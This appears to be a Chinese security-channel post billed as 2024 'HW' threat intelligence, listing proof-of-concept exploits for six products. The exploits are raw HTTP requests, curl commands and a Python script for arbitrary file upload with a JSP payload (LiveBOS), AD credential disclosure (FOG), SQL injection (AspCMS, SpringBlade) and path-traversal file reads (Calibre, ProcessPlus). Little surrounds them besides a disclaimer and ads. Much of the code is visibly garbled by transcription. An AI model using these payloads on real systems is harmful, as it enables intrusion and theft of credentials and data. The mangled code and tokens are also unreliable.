2024HW威胁情报⑤

民生   2024-08-09 16:26   海南  

 威胁情报


    看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。





01



威胁情报


1.LiveBOS接口UploadFile.do存在任意文件上传漏洞

POST /feed/UploadFile.do;.js.jsp HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxeggoxxiConnection: close

---WebKitFormBoundaryxegqoxxiContent-Disposition:form-data; name="file"; filename="/../../../../rce.jsp'Content-Type: image/jpeg
<%@ page import="java.io.File"%><%out.println("asdasd");String filePath = application.getRealPath(request.getServletPath());new File(filePath).delete();%>---WebKitFormBoundaryxegqoxxi--


2.FOG敏感信息泄露(CVE-2024-41108)

1.获取hostnamecurl -i -s -k -X $'POST' --data-binary $'file=/var/log/fog/fogschedulerloQ&iD=<BASE64 SERVERIP>$'http://<SERVERIP>/fog/status/logtoview.php'
2.验证hostname、获取mac地址GET/fog/service/hostnameloop.php?host=dGVzdGhvc30=
3.验证mac地址GET/fog/service/blame.php?mac=aa:aa:aa:aa:aa:aaresponse:##有洞response: no active task无洞
4.获取AD敏感信息curl -i -s -k -X $'GET'-H 'User-Agent:’ $'http://<SERVERIP>/fog/service/hostinfo.php?mac=aa:aa:aa:aa:aa:aa
5.获取AD凭证信息curl -i-s -k-X$'GET'$'http://<SERVERIP>/fog/service/hostname.php?mac=aa:aa:aa:aa:aa:aa'

3.AspCMS系统commentList.asp存在SQL注入漏洞

/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UseriD,GrouplD,LoginName,Password,now(,null,1%20%20fmasterom%20fprefix}user

4.Calibre任意文件读取漏洞(CVE-2024-6781)

import jsonimport sysimport requeststarget ="http://localhost:8080" # SET MEbook id=1 # ensure book id existsdef exploit(path):  r= requests.post(  f"{_target}/cdb/cmd/export"headers={"Content-Type""application/json"},json=['extra file",_book id, path, ""])try:  print(r.json()["result"]) except Exception:   print(r.text)if_name__=="main";exploit("..ll..ll..llCalibre Settingsllgui.json")

5.PerkinElmer-ProcessPlus存在文件读取漏洞(CVE-2024-6911)

GET /ProcessPlus/Log/Download/?filename=.......WindowslSystem32ldriversletc hosts&filenameWithSeriaNumber= Errors 2102162.10g HTTP/1.1Host:Accept: text/html,application/xhtml+xml,application/xml;g=0.9,image/avif,image/webp,*/*;g=0.8Accept-Language:en-US,en;g=0.5Content-Ldwk:YmllY2hhb2xlc21=Accept-Encoding: gzip, deflate, brConnection: closeUpgrade-Insecure-Requests:1

6.SpringBlade系统usual接口存在SOL注入漏洞

GET /api/blade-log/usual/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1Host:User-Agent:Mozilla/5.0 (Macintosh; Intel Mac Os X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0Blade-Auth: bearerey]hbGciOiIUzI1 NiIsInR5cCI6IkpxvCJ9.eyJ0ZW5hbnRfaWOiOiWMDAWMDAiLCJ1c2VyX25hbwUi0ihZGlpbiIsIn]lywxfbmftZSI6lueuoeeOhuWRmCIsImF1 dGhvcml0awvzlipbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lklioic2FiZXliLcIyb2xIX25hbwuioihZlpbmizdHJhdG9yliwibGiZW5zZSI6InBvd2VZWOaYnkaYmxhZGV4IWiCG9zdF9DZCI6IiEXMiM1 0TQ4MTC3MAg2NzUyMDEiLC]1c2VyX2IKIj0iMTEYMzU5ODGyMTCZODY3NTIWMSIsInJvbGVfaWoDiOiIxMTIZNTK40DE2NzM4Nic1MiAxIiwic2NvcGUi0lsiyWxsll0sIm5pY2tfbmFtZsI6lueuoee0huwRmCIsIm9hdXRoX2lklioiliwiZGv0YWlsIip7InR5cGUi0i]3ZWIifSwiYWNib3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz bMOW7dfgNjxZW47KtnFcwItxOConnection: close







更多精彩内容请扫码关注“重生者安全”星球

免责声明:

本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助

第十二条:  国家保护公民、法人和其他组织依法使用网络的权利,促进网络接入普及,提升网络服务水平,为社会提供安全、便利的网络服务,保障网络信息依法有序自由流动。

任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益,煽动颠覆国家政权、推翻社会主义制度,煽动分裂国家、破坏国家统一,宣扬恐怖主义、极端主义,宣扬民族仇恨、民族歧视,传播暴力、淫秽色情信息,编造、传播虚假信息扰乱经济秩序和社会秩序,以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。

第十三条:  国家支持研究开发有利于未成年人健康成长的网络产品和服务,依法惩治利用网络从事危害未成年人身心健康的活动,为未成年人提供安全、健康的网络环境。





道玄网安驿站
本号主推OSCP,vulnhub,车联网,红蓝对抗,挖洞,网络新闻等网络安全信息,喜欢的可以关注
 最新文章